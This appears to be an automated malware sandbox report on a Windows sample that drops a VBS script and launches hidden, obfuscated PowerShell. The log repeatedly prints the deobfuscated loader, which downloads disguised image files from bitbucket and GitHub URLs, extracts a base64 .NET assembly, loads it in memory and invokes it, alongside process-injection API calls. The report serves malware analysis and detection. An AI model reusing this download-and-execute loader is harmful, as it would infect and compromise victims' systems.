        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5924Jump to behavior
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-2345
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7532Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7600Thread sleep count: 3884 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7600Thread sleep count: 5924 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7636Thread sleep time: -11068046444225724s >= -30000sJump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeCode function: 4_2_00007FF7E6E8204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,4_2_00007FF7E6E8204C
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeCode function: 4_2_00007FF7E6E864E4 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,4_2_00007FF7E6E864E4
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: powershell.exe, 0000000B.00000002.1497423977.000002498DFF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
        Source: wscript.exe, 00000008.00000002.1287840296.0000024097ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}h
        Source: powershell.exe, 0000000B.00000002.1497423977.000002498DFF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
        Source: powershell.exe, 0000000B.00000002.1497423977.000002498DFF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeCode function: 4_2_00007FF7E6E830EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,4_2_00007FF7E6E830EC
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeCode function: 4_2_00007FF7E6E88790 SetUnhandledExceptionFilter,4_2_00007FF7E6E88790
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeCode function: 4_2_00007FF7E6E88494 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FF7E6E88494

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Yara detected Powershell download and execute
        Source: Yara matchFile source: amsi64_7548.amsi.csv, type: OTHER
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7412, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR
        .NET source code references suspicious native API functions
        Source: 11.2.powershell.exe.2498e03c5e0.1.raw.unpack, Progrgdfam3.csReference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
        Source: 11.2.powershell.exe.2498e03c5e0.1.raw.unpack, Progrgdfam3.csReference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
        Source: 11.2.powershell.exe.2498e03c5e0.1.raw.unpack, Progrgdfam3.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num4 + 8, ref buffer, 4, ref bytesRead)
        Source: 11.2.powershell.exe.2498e03c5e0.1.raw.unpack, Progrgdfam3.csReference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num3, length, 12288, 64)
        Source: 11.2.powershell.exe.2498e03c5e0.1.raw.unpack, Progrgdfam3.csReference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num5, payload, bufferSize, ref bytesRead)
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\675c87f6bfee1.vbs" Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sodigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$a$Bn$GY$a$Bo$Gs$agBl$GU$Z$Bl$GY$Z$Bm$C8$bQBu$GI$dgBn$Go$Z$Bn$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwB0$GU$cwB0$C4$agBw$Gc$Pw$1$DM$Nw$2$DE$MQ$n$Cw$I$$n$Gg$d$B0$H$$cw$6$C8$LwBy$GE$dw$u$Gc$aQB0$Gg$dQBi$HU$cwBl$HI$YwBv$G4$d$Bl$G4$d$$u$GM$bwBt$C8$ZwBt$GU$Z$B1$HM$YQ$x$DM$NQ$v$G4$YQBu$G8$LwBy$GU$ZgBz$C8$a$Bl$GE$Z$Bz$C8$bQBh$Gk$bg$v$G4$ZQB3$F8$aQBt$Gc$MQ$y$DM$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$DJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.IkIhcga/sdaolnwod/sfwqeqw/twqewqe/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -execJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$sodigo = 'wwbo$gu$d$$u$fm$zqby$hy$aqbj$gu$u$bv$gk$bgb0$e0$yqbu$ge$zwbl$hi$xq$6$do$uwbl$gm$dqby$gk$d$b5$f$$cgbv$hq$bwbj$g8$b$$g$d0$i$bb$e4$zqb0$c4$uwbl$gm$dqby$gk$d$b5$f$$cgbv$hq$bwbj$g8$b$bu$hk$c$bl$f0$og$6$fq$b$bz$de$mg$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$zgb1$g4$ywb0$gk$bwbu$c$$r$bv$hc$bgbs$g8$yqbk$eq$yqb0$ge$rgby$g8$bqbm$gk$bgbr$hm$i$b7$c$$c$bh$hi$yqbt$c$$k$bb$hm$d$by$gk$bgbn$fs$xqbd$cq$b$bp$g4$awbz$ck$i$$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$j$b3$gu$ygbd$gw$aqbl$g4$d$$g$d0$i$bo$gu$dw$t$e8$ygbq$gu$ywb0$c$$uwb5$hm$d$bl$g0$lgbo$gu$d$$u$fc$zqbi$em$b$bp$gu$bgb0$ds$i$$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$j$bz$gg$dqbm$gy$b$bl$gq$t$bp$g4$awbz$c$$pq$g$ec$zqb0$c0$ugbh$g4$z$bv$g0$i$$t$ek$bgbw$hu$d$bp$gi$agbl$gm$d$$g$cq$b$bp$g4$awbz$c$$lqbd$g8$dqbu$hq$i$$k$gw$aqbu$gs$cw$u$ew$zqbu$gc$d$bo$ds$i$$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$zgbv$hi$zqbh$gm$a$$g$cg$j$bs$gk$bgbr$c$$aqbu$c$$j$bz$gg$dqbm$gy$b$bl$gq$t$bp$g4$awbz$ck$i$b7$c$$d$by$hk$i$b7$c$$cgbl$hq$dqby$g4$i$$k$hc$zqbi$em$b$bp$gu$bgb0$c4$r$bv$hc$bgbs$g8$yqbk$eq$yqb0$ge$k$$k$gw$aqbu$gs$kq$g$h0$i$bj$ge$d$bj$gg$i$b7$c$$ywbv$g4$d$bp$g4$dqbl$c$$fq$g$h0$ow$g$$0$cg$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$by$gu$d$b1$hi$bg$g$cq$bgb1$gw$b$$g$h0$ow$g$$0$cg$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$$k$gw$aqbu$gs$cw$g$d0$i$b$$cg$jwbo$hq$d$bw$hm$og$v$c8$ygbp$hq$ygb1$gm$awbl$hq$lgbv$hi$zw$v$go$a$bn$gy$a$bo$gs$agbl$gu$z$bl$gy$z$bm$c8$bqbu$gi$dgbn$go$z$bn$c8$z$bv$hc$bgbs$g8$yqbk$hm$lwb0$gu$cwb0$c4$agbw$gc$pw$1$dm$nw$2$de$mq$n$cw$i$$n$gg$d$b0$h$$cw$6$c8$lwby$ge$dw$u$gc$aqb0$gg$dqbi$hu$cwbl$hi$ywbv$g4$d$bl$g4$d$$u$gm$bwbt$c8$zwbt$gu$z$b1$hm$yq$x$dm$nq$v$g4$yqbu$g8$lwby$gu$zgbz$c8$a$bl$ge$z$bz$c8$bqbh$gk$bg$v$g4$zqb3$f8$aqbt$gc$mq$y$dm$lgbq$h$$zw$n$ck$ow$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$$k$gk$bqbh$gc$zqbc$hk$d$bl$hm$i$$9$c$$r$bv$hc$bgbs$g8$yqbk$eq$yqb0$ge$rgby$g8$bqbm$gk$bgbr$hm$i$$k$gw$aqbu$gs$cw$7$$0$cg$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$gk$zg$g$cg$j$bp$g0$yqbn$gu$qgb5$hq$zqbz$c$$lqbu$gu$i$$k$g4$dqbs$gw$kq$g$hs$i$$k$gk$bqbh$gc$zqbu$gu$e$b0$c$$pq$g$fs$uwb5$hm$d$bl$g0$lgbu$gu$e$b0$c4$rqbu$gm$bwbk$gk$bgbn$f0$og$6$fu$v$bg$dg$lgbh$gu$d$bt$hq$cgbp$g4$zw$o$cq$aqbt$ge$zwbl$ei$eqb0$gu$cw$p$ds$dq$k$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$j$bz$hq$yqby$hq$rgbs$ge$zw$g$d0$i$$n$dw$p$bc$ee$uwbf$dy$n$bf$fm$v$bb$fi$v$$+$d4$jw$7$c$$j$bl$g4$z$bg$gw$yqbn$c$$pq$g$cc$p$$8$ei$qqbt$eu$ng$0$f8$rqbo$eq$pg$+$cc$ow$g$cq$cwb0$ge$cgb0$ek$bgbk$gu$e$$g$d0$i$$k$gk$bqbh$gc$zqbu$gu$e$b0$c4$sqbu$gq$zqb4$e8$zg$o$cq$cwb0$ge$cgb0$ey$b$bh$gc$kq$7$c$$dq$k$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$cq$zqbu$gq$sqbu$gq$zqb4$c$$pq$g$cq$aqbt$ge$zwbl$fq$zqb4$hq$lgbj$g4$z$bl$hg$twbm$cg$j$bl$g4$z$bg$gw$yqbn$ck$ow$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$bp$gy$i$$o$cq$cwb0$ge$cgb0$ek$bgbk$gu$e$$g$c0$zwbl$c$$m$$g$c0$yqbu$gq$i$$k$gu$bgbk$ek$bgbk$gu$e$$g$c0$zwb0$c$$j$bz$hq$yqby$hq$sqbu$gq$zqb4$ck$i$b7$c$$j$bz$hq$yqby$hq$sqbu$gq$zqb4$c$$kw$9$c$$j$bz$hq$yqby$hq$rgbs$ge$zw$u$ew$zqbu$gc$d$bo$d
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $encodedtext =[convert]::tobase64string($bytes); $commandbytes = [system.convert]::frombase64string($base64command); $text = $encodedtext; $loadedassembly = [system.reflection.assembly]::load($commandbytes); $encodedtext =[convert]::tobase64string($bytes); $compressedbytearray = get-compressedbytearray -bytearray $enctext $type = $loadedassembly.gettype('testpowershell.hoaaaaaasdme'); $encodedtext =[convert]::tobase64string($bytes); $method = $type.getmethod('lfsgeddddddda').invoke($null, [object[]] (' txt.ikihcga/sdaolnwod/sfwqeqw/twqewqe/gro.tekcubtib', '0', 'startupname', 'msbuild', '0'))}}" .exe -windowstyle hidden -exec
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$sodigo = 'wwbo$gu$d$$u$fm$zqby$hy$aqbj$gu$u$bv$gk$bgb0$e0$yqbu$ge$zwbl$hi$xq$6$do$uwbl$gm$dqby$gk$d$b5$f$$cgbv$hq$bwbj$g8$b$$g$d0$i$bb$e4$zqb0$c4$uwbl$gm$dqby$gk$d$b5$f$$cgbv$hq$bwbj$g8$b$bu$hk$c$bl$f0$og$6$fq$b$bz$de$mg$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$zgb1$g4$ywb0$gk$bwbu$c$$r$bv$hc$bgbs$g8$yqbk$eq$yqb0$ge$rgby$g8$bqbm$gk$bgbr$hm$i$b7$c$$c$bh$hi$yqbt$c$$k$bb$hm$d$by$gk$bgbn$fs$xqbd$cq$b$bp$g4$awbz$ck$i$$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$j$b3$gu$ygbd$gw$aqbl$g4$d$$g$d0$i$bo$gu$dw$t$e8$ygbq$gu$ywb0$c$$uwb5$hm$d$bl$g0$lgbo$gu$d$$u$fc$zqbi$em$b$bp$gu$bgb0$ds$i$$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$j$bz$gg$dqbm$gy$b$bl$gq$t$bp$g4$awbz$c$$pq$g$ec$zqb0$c0$ugbh$g4$z$bv$g0$i$$t$ek$bgbw$hu$d$bp$gi$agbl$gm$d$$g$cq$b$bp$g4$awbz$c$$lqbd$g8$dqbu$hq$i$$k$gw$aqbu$gs$cw$u$ew$zqbu$gc$d$bo$ds$i$$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$zgbv$hi$zqbh$gm$a$$g$cg$j$bs$gk$bgbr$c$$aqbu$c$$j$bz$gg$dqbm$gy$b$bl$gq$t$bp$g4$awbz$ck$i$b7$c$$d$by$hk$i$b7$c$$cgbl$hq$dqby$g4$i$$k$hc$zqbi$em$b$bp$gu$bgb0$c4$r$bv$hc$bgbs$g8$yqbk$eq$yqb0$ge$k$$k$gw$aqbu$gs$kq$g$h0$i$bj$ge$d$bj$gg$i$b7$c$$ywbv$g4$d$bp$g4$dqbl$c$$fq$g$h0$ow$g$$0$cg$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$by$gu$d$b1$hi$bg$g$cq$bgb1$gw$b$$g$h0$ow$g$$0$cg$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$$k$gw$aqbu$gs$cw$g$d0$i$b$$cg$jwbo$hq$d$bw$hm$og$v$c8$ygbp$hq$ygb1$gm$awbl$hq$lgbv$hi$zw$v$go$a$bn$gy$a$bo$gs$agbl$gu$z$bl$gy$z$bm$c8$bqbu$gi$dgbn$go$z$bn$c8$z$bv$hc$bgbs$g8$yqbk$hm$lwb0$gu$cwb0$c4$agbw$gc$pw$1$dm$nw$2$de$mq$n$cw$i$$n$gg$d$b0$h$$cw$6$c8$lwby$ge$dw$u$gc$aqb0$gg$dqbi$hu$cwbl$hi$ywbv$g4$d$bl$g4$d$$u$gm$bwbt$c8$zwbt$gu$z$b1$hm$yq$x$dm$nq$v$g4$yqbu$g8$lwby$gu$zgbz$c8$a$bl$ge$z$bz$c8$bqbh$gk$bg$v$g4$zqb3$f8$aqbt$gc$mq$y$dm$lgbq$h$$zw$n$ck$ow$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$$k$gk$bqbh$gc$zqbc$hk$d$bl$hm$i$$9$c$$r$bv$hc$bgbs$g8$yqbk$eq$yqb0$ge$rgby$g8$bqbm$gk$bgbr$hm$i$$k$gw$aqbu$gs$cw$7$$0$cg$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$gk$zg$g$cg$j$bp$g0$yqbn$gu$qgb5$hq$zqbz$c$$lqbu$gu$i$$k$g4$dqbs$gw$kq$g$hs$i$$k$gk$bqbh$gc$zqbu$gu$e$b0$c$$pq$g$fs$uwb5$hm$d$bl$g0$lgbu$gu$e$b0$c4$rqbu$gm$bwbk$gk$bgbn$f0$og$6$fu$v$bg$dg$lgbh$gu$d$bt$hq$cgbp$g4$zw$o$cq$aqbt$ge$zwbl$ei$eqb0$gu$cw$p$ds$dq$k$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$j$bz$hq$yqby$hq$rgbs$ge$zw$g$d0$i$$n$dw$p$bc$ee$uwbf$dy$n$bf$fm$v$bb$fi$v$$+$d4$jw$7$c$$j$bl$g4$z$bg$gw$yqbn$c$$pq$g$cc$p$$8$ei$qqbt$eu$ng$0$f8$rqbo$eq$pg$+$cc$ow$g$cq$cwb0$ge$cgb0$ek$bgbk$gu$e$$g$d0$i$$k$gk$bqbh$gc$zqbu$gu$e$b0$c4$sqbu$gq$zqb4$e8$zg$o$cq$cwb0$ge$cgb0$ey$b$bh$gc$kq$7$c$$dq$k$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$cq$zqbu$gq$sqbu$gq$zqb4$c$$pq$g$cq$aqbt$ge$zwbl$fq$zqb4$hq$lgbj$g4$z$bl$hg$twbm$cg$j$bl$g4$z$bg$gw$yqbn$ck$ow$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$bp$gy$i$$o$cq$cwb0$ge$cgb0$ek$bgbk$gu$e$$g$c0$zwbl$c$$m$$g$c0$yqbu$gq$i$$k$gu$bgbk$ek$bgbk$gu$e$$g$c0$zwb0$c$$j$bz$hq$yqby$hq$sqbu$gq$zqb4$ck$i$b7$c$$j$bz$hq$yqby$hq$sqbu$gq$zqb4$c$$kw$9$c$$j$bz$hq$yqby$hq$rgbs$ge$zw$u$ew$zqbu$gc$d$bo$dJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $encodedtext =[convert]::tobase64string($bytes); $commandbytes = [system.convert]::frombase64string($base64command); $text = $encodedtext; $loadedassembly = [system.reflection.assembly]::load($commandbytes); $encodedtext =[convert]::tobase64string($bytes); $compressedbytearray = get-compressedbytearray -bytearray $enctext $type = $loadedassembly.gettype('testpowershell.hoaaaaaasdme'); $encodedtext =[convert]::tobase64string($bytes); $method = $type.getmethod('lfsgeddddddda').invoke($null, [object[]] (' txt.ikihcga/sdaolnwod/sfwqeqw/twqewqe/gro.tekcubtib', '0', 'startupname', 'msbuild', '0'))}}" .exe -windowstyle hidden -execJump to behavior
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeCode function: 4_2_00007FF7E6E812EC GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,4_2_00007FF7E6E812EC
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
